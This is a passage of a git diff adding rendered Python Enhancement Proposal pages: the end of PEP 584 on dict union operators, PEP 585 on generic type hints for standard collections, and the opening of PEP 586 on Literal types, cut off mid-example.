There are two primary reasons why adding the new operators to these +classes would be problematic:

+
    +
  • Currently, neither defines a copy method, which would be +necessary for | to create a new instance.
  • +
  • Adding |= to MutableMapping (or a copy method to +Mapping) would create compatibility issues for virtual +subclasses.
  • +
+
+
+
+
+

Rejected Ideas

+
+

Rejected Semantics

+

There were at least four other proposed solutions for handling +conflicting keys. These alternatives are left to subclasses of dict.

+
+

Raise

+

It isn’t clear that this behavior has many use-cases or will be often +useful, but it will likely be annoying as any use of the dict union +operator would have to be guarded with a try/except clause.

+
+
+

Add The Values (As Counter Does, with +)

+

Too specialised to be used as the default behavior.

+
+
+

Leftmost Value (First-Seen) Wins

+

It isn’t clear that this behavior has many use-cases. In fact, one +can simply reverse the order of the arguments:

+
d2 | d1  # d1 merged with d2, keeping existing values in d1
+
+
+
+
+

Concatenate Values In A List

+

This is likely to be too specialised to be the default. It is not +clear what to do if the values are already lists:

+
{'a': [1, 2]} | {'a': [3, 4]}
+
+
+

Should this give {'a': [1, 2, 3, 4]} or +{'a': [[1, 2], [3, 4]]}?

+
+
+
+

Rejected Alternatives

+
+

Use The Addition Operator

+

This PEP originally started life as a proposal for dict addition, +using the + and += operator. That choice proved to be +exceedingly controversial, with many people having serious objections +to the choice of operator. For details, see previous versions of the +PEP and the mailing list discussions.

+
+
+

Use The Left Shift Operator

+

The << operator didn’t seem to get much support on Python-Ideas, +but no major objections either. Perhaps the strongest objection was +Chris Angelico’s comment

+
+
The “cuteness” value of abusing the operator to indicate +information flow got old shortly after C++ did it.
+
+
+

Use A New Left Arrow Operator

+

Another suggestion was to create a new operator <-. Unfortunately +this would be ambiguous, d <- e could mean d merge e or +d less-than minus e.

+
+
+

Use A Method

+

A dict.merged() method would avoid the need for an operator at +all. One subtlety is that it would likely need slightly different +implementations when called as an unbound method versus as a bound +method.

+

As an unbound method, the behavior could be similar to:

+
def merged(cls, *mappings, **kw):
+    new = cls()  # Will this work for defaultdict?
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+

As a bound method, the behavior could be similar to:

+
def merged(self, *mappings, **kw):
+    new = self.copy()
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+
+
Advantages
+
    +
  • Arguably, methods are more discoverable than operators.
  • +
  • The method could accept any number of positional and keyword +arguments, avoiding the inefficiency of creating temporary dicts.
  • +
  • Accepts sequences of (key, value) pairs like the update +method.
  • +
  • Being a method, it is easy to override in a subclass if you need +alternative behaviors such as “first wins”, “unique keys”, etc.
  • +
+
+
+
Disadvantages
+
    +
  • Would likely require a new kind of method decorator which combined +the behavior of regular instance methods and classmethod. It +would need to be public (but not necessarily a builtin) for those +needing to override the method. There is a +proof of concept.
  • +
  • It isn’t an operator. Guido discusses why operators are useful. +For another viewpoint, see Alyssa Coghlan’s blog post.
  • +
+
+
+
+

Use a Function

+

Instead of a method, use a new built-in function merged(). One +possible implementation could be something like this:

+
def merged(*mappings, **kw):
+    if mappings and isinstance(mappings[0], dict):
+        # If the first argument is a dict, use its type.
+        new = mappings[0].copy()
+        mappings = mappings[1:]
+    else:
+        # No positional arguments, or the first argument is a
+        # sequence of (key, value) pairs.
+        new = dict()
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+

An alternative might be to forgo the arbitrary keywords, and take a +single keyword parameter that specifies the behavior on collisions:

+
def merged(*mappings, on_collision=lambda k, v1, v2: v2):
+    # implementation left as an exercise to the reader
+
+
+
+
Advantages
+
    +
  • Most of the same advantages of the method solutions above.
  • +
  • Doesn’t require a subclass to implement alternative behavior on +collisions, just a function.
  • +
+
+
+
Disadvantages
+
    +
  • May not be important enough to be a builtin.
  • +
  • Hard to override behavior if you need something like “first wins”, +without losing the ability to process arbitrary keyword arguments.
  • +
+
+
+
+
+
+

Examples

+

The authors of this PEP did a survey of third party libraries for +dictionary merging which might be candidates for dict union.

+

This is a cursory list based on a subset of whatever arbitrary +third-party packages happened to be installed on one of the authors’ +computers, and may not reflect the current state of any package. Also +note that, while further (unrelated) refactoring may be possible, the +rewritten version only adds usage of the new operators for an +apples-to-apples comparison. It also reduces the result to an +expression when it is efficient to do so.

+
+

IPython/zmq/ipkernel.py

+

Before:

+
aliases = dict(kernel_aliases)
+aliases.update(shell_aliases)
+
+
+

After:

+
aliases = kernel_aliases | shell_aliases
+
+
+
+
+

IPython/zmq/kernelapp.py

+

Before:

+
kernel_aliases = dict(base_aliases)
+kernel_aliases.update({
+    'ip' : 'KernelApp.ip',
+    'hb' : 'KernelApp.hb_port',
+    'shell' : 'KernelApp.shell_port',
+    'iopub' : 'KernelApp.iopub_port',
+    'stdin' : 'KernelApp.stdin_port',
+    'parent': 'KernelApp.parent',
+})
+if sys.platform.startswith('win'):
+    kernel_aliases['interrupt'] = 'KernelApp.interrupt'
+
+kernel_flags = dict(base_flags)
+kernel_flags.update({
+    'no-stdout' : (
+            {'KernelApp' : {'no_stdout' : True}},
+            "redirect stdout to the null device"),
+    'no-stderr' : (
+            {'KernelApp' : {'no_stderr' : True}},
+            "redirect stderr to the null device"),
+})
+
+
+

After:

+
kernel_aliases = base_aliases | {
+    'ip' : 'KernelApp.ip',
+    'hb' : 'KernelApp.hb_port',
+    'shell' : 'KernelApp.shell_port',
+    'iopub' : 'KernelApp.iopub_port',
+    'stdin' : 'KernelApp.stdin_port',
+    'parent': 'KernelApp.parent',
+}
+if sys.platform.startswith('win'):
+    kernel_aliases['interrupt'] = 'KernelApp.interrupt'
+
+kernel_flags = base_flags | {
+    'no-stdout' : (
+            {'KernelApp' : {'no_stdout' : True}},
+            "redirect stdout to the null device"),
+    'no-stderr' : (
+            {'KernelApp' : {'no_stderr' : True}},
+            "redirect stderr to the null device"),
+}
+
+
+
+
+

matplotlib/backends/backend_svg.py

+

Before:

+
attrib = attrib.copy()
+attrib.update(extra)
+attrib = attrib.items()
+
+
+

After:

+
attrib = (attrib | extra).items()
+
+
+
+
+

matplotlib/delaunay/triangulate.py

+

Before:

+
edges = {}
+edges.update(dict(zip(self.triangle_nodes[border[:,0]][:,1],
+             self.triangle_nodes[border[:,0]][:,2])))
+edges.update(dict(zip(self.triangle_nodes[border[:,1]][:,2],
+             self.triangle_nodes[border[:,1]][:,0])))
+edges.update(dict(zip(self.triangle_nodes[border[:,2]][:,0],
+             self.triangle_nodes[border[:,2]][:,1])))
+
+
+

Rewrite as:

+
edges = {}
+edges |= zip(self.triangle_nodes[border[:,0]][:,1],
+             self.triangle_nodes[border[:,0]][:,2])
+edges |= zip(self.triangle_nodes[border[:,1]][:,2],
+             self.triangle_nodes[border[:,1]][:,0])
+edges |= zip(self.triangle_nodes[border[:,2]][:,0],
+             self.triangle_nodes[border[:,2]][:,1])
+
+
+
+
+

matplotlib/legend.py

+

Before:

+
hm = default_handler_map.copy()
+hm.update(self._handler_map)
+return hm
+
+
+

After:

+
return default_handler_map | self._handler_map
+
+
+
+
+

numpy/ma/core.py

+

Before:

+
_optinfo = {}
+_optinfo.update(getattr(obj, '_optinfo', {}))
+_optinfo.update(getattr(obj, '_basedict', {}))
+if not isinstance(obj, MaskedArray):
+    _optinfo.update(getattr(obj, '__dict__', {}))
+
+
+

After:

+
_optinfo = {}
+_optinfo |= getattr(obj, '_optinfo', {})
+_optinfo |= getattr(obj, '_basedict', {})
+if not isinstance(obj, MaskedArray):
+    _optinfo |= getattr(obj, '__dict__', {})
+
+
+
+
+

praw/internal.py

+

Before:

+
data = {'name': six.text_type(user), 'type': relationship}
+data.update(kwargs)
+
+
+

After:

+
data = {'name': six.text_type(user), 'type': relationship} | kwargs
+
+
+
+
+

pygments/lexer.py

+

Before:

+
kwargs.update(lexer.options)
+lx = lexer.__class__(**kwargs)
+
+
+

After:

+
lx = lexer.__class__(**(kwargs | lexer.options))
+
+
+
+
+

requests/sessions.py

+

Before:

+
merged_setting = dict_class(to_key_val_list(session_setting))
+merged_setting.update(to_key_val_list(request_setting))
+
+
+

After:

+
merged_setting = dict_class(to_key_val_list(session_setting)) | to_key_val_list(request_setting)
+
+
+
+
+

sphinx/domains/__init__.py

+

Before:

+
self.attrs = self.known_attrs.copy()
+self.attrs.update(attrs)
+
+
+

After:

+
self.attrs = self.known_attrs | attrs
+
+
+
+
+

sphinx/ext/doctest.py

+

Before:

+
new_opt = code[0].options.copy()
+new_opt.update(example.options)
+example.options = new_opt
+
+
+

After:

+
example.options = code[0].options | example.options
+
+
+
+
+

sphinx/ext/inheritance_diagram.py

+

Before:

+
n_attrs = self.default_node_attrs.copy()
+e_attrs = self.default_edge_attrs.copy()
+g_attrs.update(graph_attrs)
+n_attrs.update(node_attrs)
+e_attrs.update(edge_attrs)
+
+
+

After:

+
g_attrs |= graph_attrs
+n_attrs = self.default_node_attrs | node_attrs
+e_attrs = self.default_edge_attrs | edge_attrs
+
+
+
+
+

sphinx/highlighting.py

+

Before:

+
kwargs.update(self.formatter_args)
+return self.formatter(**kwargs)
+
+
+

After:

+
return self.formatter(**(kwargs | self.formatter_args))
+
+
+
+
+

sphinx/quickstart.py

+

Before:

+
d2 = DEFAULT_VALUE.copy()
+d2.update(dict(("ext_"+ext, False) for ext in EXTENSIONS))
+d2.update(d)
+d = d2
+
+
+

After:

+
d = DEFAULT_VALUE | dict(("ext_"+ext, False) for ext in EXTENSIONS) | d
+
+
+
+
+

sympy/abc.py

+

Before:

+
clash = {}
+clash.update(clash1)
+clash.update(clash2)
+return clash1, clash2, clash
+
+
+

After:

+
return clash1, clash2, clash1 | clash2
+
+
+
+
+

sympy/parsing/maxima.py

+

Before:

+
dct = MaximaHelpers.__dict__.copy()
+dct.update(name_dict)
+obj = sympify(str, locals=dct)
+
+
+

After:

+
obj = sympify(str, locals=MaximaHelpers.__dict__|name_dict)
+
+
+
+
+

sympy/printing/ccode.py and sympy/printing/fcode.py

+

Before:

+
self.known_functions = dict(known_functions)
+userfuncs = settings.get('user_functions', {})
+self.known_functions.update(userfuncs)
+
+
+

After:

+
self.known_functions = known_functions | settings.get('user_functions', {})
+
+
+
+
+

sympy/utilities/runtests.py

+

Before:

+
globs = globs.copy()
+if extraglobs is not None:
+    globs.update(extraglobs)
+
+
+

After:

+
globs = globs | (extraglobs if extraglobs is not None else {})
+
+
+

The above examples show that sometimes the | operator leads to a +clear increase in readability, reducing the number of lines of code +and improving clarity. However other examples using the | +operator lead to long, complex single expressions, possibly well over +the PEP 8 maximum line length of 80 columns. As with any other +language feature, the programmer should use their own judgement about +whether | improves their code.

+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0584.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0585/index.html b/pep-0585/index.html new file mode 100644 index 00000000000..abe5d1e8e45 --- /dev/null +++ b/pep-0585/index.html @@ -0,0 +1,493 @@ + + + + + + + + PEP 585 – Type Hinting Generics In Standard Collections | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 585 – Type Hinting Generics In Standard Collections

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
03-Mar-2019
+
Python-Version:
+
3.9
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Generic Alias Type +and the documentation for __class_getitem__().

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Static typing as defined by PEPs 484, 526, 544, 560, and 563 was built +incrementally on top of the existing Python runtime and constrained by +existing syntax and runtime behavior. This led to the existence of +a duplicated collection hierarchy in the typing module due to +generics (for example typing.List and the built-in list).

+

This PEP proposes to enable support for the generics syntax in all +standard collections currently available in the typing module.

+
+
+

Rationale and Goals

+

This change removes the necessity for a parallel type hierarchy in the +typing module, making it easier for users to annotate their programs +and easier for teachers to teach Python.

+
+
+

Terminology

+

Generic (n.) – a type that can be parameterized, typically a container. +Also known as a parametric type or a generic type. For example: +dict.

+

parameterized generic – a specific instance of a generic with the +expected types for container elements provided. Also known as +a parameterized type. For example: dict[str, int].

+
+
+

Backwards compatibility

+

Tooling, including type checkers and linters, will have to be adapted to +recognize standard collections as generics.

+

On the source level, the newly described functionality requires +Python 3.9. For use cases restricted to type annotations, Python files +with the “annotations” future-import (available since Python 3.7) can +parameterize standard collections, including builtins. To reiterate, +that depends on the external tools understanding that this is valid.

+
+
+

Implementation

+

Starting with Python 3.7, when from __future__ import annotations is +used, function and variable annotations can parameterize standard +collections directly. Example:

+
from __future__ import annotations
+
+def find(haystack: dict[str, list[int]]) -> int:
+    ...
+
+
+

Usefulness of this syntax before PEP 585 is limited as external tooling +like Mypy does not recognize standard collections as generic. Moreover, +certain features of typing like type aliases or casting require putting +types outside of annotations, in runtime context. While these are +relatively less common than type annotations, it’s important to allow +using the same type syntax in all contexts. This is why starting with +Python 3.9, the following collections become generic using +__class_getitem__() to parameterize contained types:

+
    +
  • tuple # typing.Tuple
  • +
  • list # typing.List
  • +
  • dict # typing.Dict
  • +
  • set # typing.Set
  • +
  • frozenset # typing.FrozenSet
  • +
  • type # typing.Type
  • +
  • collections.deque
  • +
  • collections.defaultdict
  • +
  • collections.OrderedDict
  • +
  • collections.Counter
  • +
  • collections.ChainMap
  • +
  • collections.abc.Awaitable
  • +
  • collections.abc.Coroutine
  • +
  • collections.abc.AsyncIterable
  • +
  • collections.abc.AsyncIterator
  • +
  • collections.abc.AsyncGenerator
  • +
  • collections.abc.Iterable
  • +
  • collections.abc.Iterator
  • +
  • collections.abc.Generator
  • +
  • collections.abc.Reversible
  • +
  • collections.abc.Container
  • +
  • collections.abc.Collection
  • +
  • collections.abc.Callable
  • +
  • collections.abc.Set # typing.AbstractSet
  • +
  • collections.abc.MutableSet
  • +
  • collections.abc.Mapping
  • +
  • collections.abc.MutableMapping
  • +
  • collections.abc.Sequence
  • +
  • collections.abc.MutableSequence
  • +
  • collections.abc.ByteString
  • +
  • collections.abc.MappingView
  • +
  • collections.abc.KeysView
  • +
  • collections.abc.ItemsView
  • +
  • collections.abc.ValuesView
  • +
  • contextlib.AbstractContextManager # typing.ContextManager
  • +
  • contextlib.AbstractAsyncContextManager # typing.AsyncContextManager
  • +
  • re.Pattern # typing.Pattern, typing.re.Pattern
  • +
  • re.Match # typing.Match, typing.re.Match
  • +
+

Importing those from typing is deprecated. Due to PEP 563 and the +intention to minimize the runtime impact of typing, this deprecation +will not generate DeprecationWarnings. Instead, type checkers may warn +about such deprecated usage when the target version of the checked +program is signalled to be Python 3.9 or newer. It’s recommended to +allow for those warnings to be silenced on a project-wide basis.

+

The deprecated functionality may eventually be removed from the typing +module. Removal will occur no sooner than Python 3.9’s end of life, +scheduled for October 2025.

+
+

Parameters to generics are available at runtime

+

Preserving the generic type at runtime enables introspection of the type +which can be used for API generation or runtime type checking. Such +usage is already present in the wild.

+

Just like with the typing module today, the parameterized generic +types listed in the previous section all preserve their type parameters +at runtime:

+
>>> list[str]
+list[str]
+>>> tuple[int, ...]
+tuple[int, ...]
+>>> ChainMap[str, list[str]]
+collections.ChainMap[str, list[str]]
+
+
+

This is implemented using a thin proxy type that forwards all method +calls and attribute accesses to the bare origin type with the following +exceptions:

+
    +
  • the __repr__ shows the parameterized type;
  • +
  • the __origin__ attribute points at the non-parameterized +generic class;
  • +
  • the __args__ attribute is a tuple (possibly of length +1) of generic types passed to the original __class_getitem__;
  • +
  • the __parameters__ attribute is a lazily computed tuple +(possibly empty) of unique type variables found in __args__;
  • +
  • the __getitem__ raises an exception to disallow mistakes +like dict[str][str]. However it allows e.g. dict[str, T][int] +and in that case returns dict[str, int].
  • +
+

This design means that it is possible to create instances of +parameterized collections, like:

+
>>> l = list[str]()
+[]
+>>> list is list[str]
+False
+>>> list == list[str]
+False
+>>> list[str] == list[str]
+True
+>>> list[str] == list[int]
+False
+>>> isinstance([1, 2, 3], list[str])
+TypeError: isinstance() arg 2 cannot be a parameterized generic
+>>> issubclass(list, list[str])
+TypeError: issubclass() arg 2 cannot be a parameterized generic
+>>> isinstance(list[str], types.GenericAlias)
+True
+
+
+

Objects created with bare types and parameterized types are exactly the +same. The generic parameters are not preserved in instances created +with parameterized types, in other words generic types erase type +parameters during object creation.

+

One important consequence of this is that the interpreter does not +attempt to type check operations on the collection created with +a parameterized type. This provides symmetry between:

+
l: list[str] = []
+
+
+

and:

+
l = list[str]()
+
+
+

For accessing the proxy type from Python code, it will be exported +from the types module as GenericAlias.

+

Pickling or (shallow- or deep-) copying a GenericAlias instance +will preserve the type, origin, attributes and parameters.

+
+
+

Forward compatibility

+

Future standard collections must implement the same behavior.

+
+
+
+

Reference implementation

+

A proof-of-concept or prototype implementation exists.

+
+
+

Rejected alternatives

+
+

Do nothing

+

Keeping the status quo forces Python programmers to perform book-keeping +of imports from the typing module for standard collections, making +all but the simplest annotations cumbersome to maintain. The existence +of parallel types is confusing to newcomers (why is there both list +and List?).

+

The above problems also don’t exist in user-built generic classes which +share runtime functionality and the ability to use them as generic type +annotations. Making standard collections harder to use in type hinting +from user classes hindered typing adoption and usability.

+
+
+

Generics erasure

+

It would be easier to implement __class_getitem__ on the listed +standard collections in a way that doesn’t preserve the generic type, +in other words:

+
>>> list[str]
+<class 'list'>
+>>> tuple[int, ...]
+<class 'tuple'>
+>>> collections.ChainMap[str, list[str]]
+<class 'collections.ChainMap'>
+
+
+

This is problematic as it breaks backwards compatibility: current +equivalents of those types in the typing module do preserve +the generic type:

+
>>> from typing import List, Tuple, ChainMap
+>>> List[str]
+typing.List[str]
+>>> Tuple[int, ...]
+typing.Tuple[int, ...]
+>>> ChainMap[str, List[str]]
+typing.ChainMap[str, typing.List[str]]
+
+
+

As mentioned in the “Implementation” section, preserving the generic +type at runtime enables runtime introspection of the type which can be +used for API generation or runtime type checking. Such usage is already +present in the wild.

+

Additionally, implementing subscripts as identity functions would make +Python less friendly to beginners. Say, if a user is mistakenly passing +a list type instead of a list object to a function, and that function is +indexing the received object, the code would no longer raise an error.

+

Today:

+
>>> l = list
+>>> l[-1]
+TypeError: 'type' object is not subscriptable
+
+
+

With __class_getitem__ as an identity function:

+
>>> l = list
+>>> l[-1]
+list
+
+
+

The indexing being successful here would likely end up raising an +exception at a distance, confusing the user.

+
+
+

Disallowing instantiation of parameterized types

+

Given that the proxy type which preserves __origin__ and +__args__ is mostly useful for runtime introspection purposes, +we might have disallowed instantiation of parameterized types.

+

In fact, forbidding instantiation of parameterized types is what the +typing module does today for types which parallel builtin +collections (instantiation of other parameterized types is allowed).

+

The original reason for this decision was to discourage spurious +parameterization which made object creation up to two orders of magnitude +slower compared to the special syntax available for those builtin +collections.

+

This rationale is not strong enough to allow the exceptional treatment +of builtins. All other parameterized types can be instantiated, +including parallels of collections in the standard library. Moreover, +Python allows for instantiation of lists using list() and some +builtin collections don’t provide special syntax for instantiation.

+
+
+

Making isinstance(obj, list[str]) perform a check ignoring generics

+

An earlier version of this PEP suggested treating parameterized generics +like list[str] as equivalent to their non-parameterized variants +like list for purposes of isinstance() and issubclass(). +This would be symmetrical to how list[str]() creates a regular list.

+

This design was rejected because isinstance() and issubclass() +checks with parameterized generics would read like element-by-element +runtime type checks. The result of those checks would be surprising, +for example:

+
>>> isinstance([1, 2, 3], list[str])
+True
+
+
+

Note the object doesn’t match the provided generic type but +isinstance() still returns True because it only checks whether +the object is a list.

+

If a library is faced with a parameterized generic and would like to +perform an isinstance() check using the base type, that type can +be retrieved using the __origin__ attribute on the parameterized +generic.

+
+
+

Making isinstance(obj, list[str]) perform a runtime type check

+

This functionality requires iterating over the collection which is +a destructive operation in some of them. This functionality would have +been useful, however implementing the type checker within Python that +would deal with complex types, nested type checking, type variables, +string forward references, and so on is out of scope for this PEP.

+
+
+

Naming the type GenericType instead of GenericAlias

+

We considered a different name for this type, but decided +GenericAlias is better – these aren’t real types, they are +aliases for the corresponding container type with some extra metadata +attached.

+
+
+
+

Note on the initial draft

+

An early version of this PEP discussed matters beyond generics in +standard collections. Those unrelated topics were removed for clarity.

+
+
+

Acknowledgments

+

Thank you to Guido van Rossum for his work on Python, and the +implementation of this PEP specifically.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0585.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0586/index.html b/pep-0586/index.html new file mode 100644 index 00000000000..23359ef769b --- /dev/null +++ b/pep-0586/index.html @@ -0,0 +1,875 @@ + + + + + + + + PEP 586 – Literal Types | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 586 – Literal Types

+
+
Author:
+
Michael Lee <michael.lee.0x2a at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
14-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+
14-Mar-2019
+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Literals and +typing.Literal for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes adding Literal types to the PEP 484 ecosystem. +Literal types indicate that some expression has literally a +specific value. For example, the following function will accept +only expressions that have literally the value “4”:

+
from typing import Literal
+
+def accepts_only_four(x: Literal[4]) -> None:
+    pass
+
+accepts_only_four(4)   # OK
+accepts_only_four(19)  # Rejected
+
+
+
+
+

Motivation and Rationale

+

Python has many APIs that return different types depending on the +value of some argument provided. For example:

+
    +
  • open(filename, mode) returns either IO[bytes] or IO[Text] +depending on whether the second argument is something like r or +rb.
  • +
  • subprocess.check_output(...) returns either bytes or text +depending on whether the universal_newlines keyword argument is +set to True or not.
  • +
+

This pattern is also fairly common in many popular 3rd party libraries. +For example, here are just two examples from pandas and numpy respectively:

+
    +
  • pandas.concat(...) will return either Series or +DataFrame depending on whether the axis argument is set to +0 or 1.
  • +
  • numpy.unique will return either a single array or a tuple containing +anywhere from two to four arrays depending on three boolean flag values.
  • +
+

The typing issue tracker contains some +additional examples and discussion.

+

There is currently no way of expressing the type signatures of these +functions: PEP 484 does not include any mechanism for writing signatures +where the return type varies depending on the value passed in. +Note that this problem persists even if we redesign these APIs to +instead accept enums: MyEnum.FOO and MyEnum.BAR are both +considered to be of type MyEnum.

+

Currently, type checkers work around this limitation by adding ad hoc +extensions for important builtins and standard library functions. For +example, mypy comes bundled with a plugin that attempts to infer more +precise types for open(...). While this approach works for standard +library functions, it’s unsustainable in general: it’s not reasonable to +expect 3rd party library authors to maintain plugins for N different +type checkers.

+

We propose adding Literal types to address these gaps.

+
+
+

Core Semantics

+

This section outlines the baseline behavior of literal types.

+
+

Core behavior

+

Literal types indicate that a variable has a specific and +concrete value. For example, if we define some variable foo to have +type Literal[3], we are declaring that foo must be exactly equal +to 3 and no other value.

+

Given some value v that is a member of type T, the type +Literal[v] shall be treated as a subtype of T. For example, +Literal[3] is a subtype of int.

+

All methods from the parent type will be directly inherited by the +literal type. So, if we have some variable foo of type Literal[3] +it’s safe to do things like foo + 5 since foo inherits int’s +__add__ method. The resulting type of foo + 5 is int.

+

This “inheriting” behavior is identical to how we +handle NewTypes.

+
+
+

Equivalence of two Literals

+

Two types Literal[v1] and Literal[v2] are equivalent when +both of the following conditions are true:

+
    +
  1. type(v1) == type(v2)
  2. +
  3. v1 == v2
  4. +
+

For example, Literal[20] and Literal[0x14] are equivalent. +However, Literal[0] and Literal[False] is not equivalent +despite that 0 == False evaluates to ‘true’ at runtime: 0 +has type int and False has type bool.

+
+
+

Shortening unions of literals

+

Literals are parameterized with one or more values. When a Literal is +parameterized with more than one value, it’s treated as exactly equivalent +to the union of those types. That is, Literal[v1, v2, v3] is equivalent +to Union[Literal[v1], Literal[v2], Literal[v3]].

+

This shortcut helps make writing signatures for functions that accept +many different literals more ergonomic — for example, functions like +open(...):

+
# Note: this is a simplification of the true type signature.
+_PathType = Union[str, bytes, int]
+
+@overload
+def open(path: _PathType,
+         mode: Literal["r", "w", "a", "x", "r+", "w+", "a+", "x+"],
+         ) -> IO[Text]: ...
+@overload
+def open(path: _PathType,
+         mode: Literal["rb", "wb", "ab", "xb", "r+b", "w+b", "a+b", "x+b"],
+         ) -> IO[bytes]: ...
+
+# Fallback overload for when the user isn't using literal types
+@overload
+def open(path: _PathType, mode: str) -> IO[Any]: ...
+
+
+

The provided values do not all have to be members of the same type. +For example, Literal[42, "foo", True] is a legal type.

+

However, Literal must be parameterized with at least one type. +Types like Literal[] or Literal are illegal.

+
+
+ +
+

Type inference

+

This section describes a few rules regarding type inference and +literals, along with some examples.

+
+

Backwards compatibility

+

When type checkers add support for Literal, it’s important they do so +in a way that maximizes backwards-compatibility. Type checkers should +ensure that code that used to type check continues to do so after support +for Literal is added on a best-effort basis.

+

This is particularly important when performing type inference. For +example, given the statement x = "blue", should the inferred +type of x be str or Literal["blue"]?

+

One naive strategy would be to always assume expressions are intended +to be Literal types. So, x would always have an inferred type of +Literal["blue"] in the example above. This naive strategy is almost +certainly too disruptive – it would cause programs like the following +to start failing when they previously did not:

+
# If a type checker infers 'var' has type Literal[3]
+# and my_list has type List[Literal[3]]...
+var = 3
+my_list = [var]
+
+# ...this call would be a type-error.
+my_list.append(4)
+
+
+

Another example of when this strategy would fail is when setting fields +in objects:

+
class MyObject:
+    def __init__(self) -> None:
+        # If a type checker infers MyObject.field has type Literal[3]...
+        self.field = 3
+
+m = MyObject()
+
+# ...this assignment would no longer type check
+m.field = 4
+
+
+

An alternative strategy that does maintain compatibility in every case would +be to always assume expressions are not Literal types unless they are +explicitly annotated otherwise. A type checker using this strategy would +always infer that x is of type str in the first example above.

+

This is not the only viable strategy: type checkers should feel free to experiment +with more sophisticated inference techniques. This PEP does not mandate any +particular strategy; it only emphasizes the importance of backwards compatibility.

+
+
+

Using non-Literals in Literal contexts

+

Literal types follow the existing rules regarding subtyping with no additional +special-casing. For example, programs like the following are type safe:

+
def expects_str(x: str) -> None: ...
+var: Literal["foo"] = "foo"
+
+# Legal: Literal["foo"] is a subtype of str
+expects_str(var)
+
+
+

This also means non-Literal expressions in general should not automatically +be cast to Literal. For example:

+
def expects_literal(x: Literal["foo"]) -> None: ...
+
+def runner(my_str: str) -> None:
+    # ILLEGAL: str is not a subclass of Literal["foo"]
+    expects_literal(my_str)
+
+
+

Note: If the user wants their API to support accepting both literals +and the original type – perhaps for legacy purposes – they should +implement a fallback overload. See Interactions with overloads.

+
+
+
+

Interactions with other types and features

+

This section discusses how Literal types interact with other existing types.

+
+

Intelligent indexing of structured data

+

Literals can be used to “intelligently index” into structured types like +tuples, NamedTuple, and classes. (Note: this is not an exhaustive list).

+

For example, type checkers should infer the correct value type when +indexing into a tuple using an int key that corresponds a valid index:

+
a: Literal[0] = 0
+b: Literal[5] = 5
+
+some_tuple: Tuple[int, str, List[bool]] = (3, "abc", [True, False])
+reveal_type(some_tuple[a])   # Revealed type is 'int'
+some_tuple[b]                # Error: 5 is not a valid index into the tuple
+
+
+

We expect similar behavior when using functions like getattr:

+
class Test:
+    def __init__(self, param: int) -> None:
+        self.myfield = param
+
+    def mymethod(self, val: int) -> str: ...
+
+a: Literal["myfield"]  = "myfield"
+b: Literal["mymethod"] = "mymethod"
+c: Literal["blah"]     = "blah"
+
+t = Test()
+reveal_type(getattr(t, a))  # Revealed type is 'int'
+reveal_type(getattr(t, b))  # Revealed type is 'Callable[[int], str]'
+getattr(t, c)               # Error: No attribute named 'blah' in Test
+
+
+

Note: See Interactions with Final for a proposal on how we can +express the variable declarations above in a more compact manner.

+
+
+

Interactions with overloads

+

Literal types and overloads do not need to interact in a special +way: the existing rules work fine.

+

However, one important use case type checkers must take care to +support is the ability to use a fallback when the user is not using literal +types. For example, consider open:

+
_PathType = Union[str, bytes, int]
+
+@overload
+def open(path: _PathType,
+         mode: Literal["r", "w", "a", "x", "r+", "w+", "a+", "x+"],
+         ) -> IO[Text]: ...
+@overload
+def open(path: _PathType,
+         mode: Literal["rb", "wb", "ab", "xb", "r+b", "w+b", "a+b", "x+b"],
+         ) -> IO[bytes]: ...
+
+# Fallback overload for when the user isn't using literal types
+@overload
+def open(path: _PathType, mode: str) -> IO[Any]: ...
+
+
+

If we were to change the signature of open to use just the first two overloads, +we would break any code that does not pass in a literal string expression. +For example, code like this would be broken:

+
mode: str = pick_file_mode(...)
+with open(path, mode) as f:
+    # f should continue to be of type IO[Any] here
+
+
+

A little more broadly: we propose adding a policy to typeshed that +mandates that whenever we add literal types to some existing API, we also +always include a fallback overload to maintain backwards-compatibility.

+
+
+

Interactions with generics

+

Types like Literal[3] are meant to be just plain old subclasses of +int. This means you can use types like Literal[3] anywhere +you could use normal types, such as with generics.

+

This means that it is legal to parameterize generic functions or +classes using Literal types:

+
A = TypeVar('A', bound=int)
+B = TypeVar('B', bound=int)
+C = TypeVar('C', bound=int)
+
+# A simplified definition for Matrix[row, column]
+class Matrix(Generic[A, B]):
+    def __add__(self, other: Matrix[A, B]) -> Matrix[A, B]: ...
+    def __matmul__(self, other: Matrix[B, C]) -> Matrix[A, C]: ...
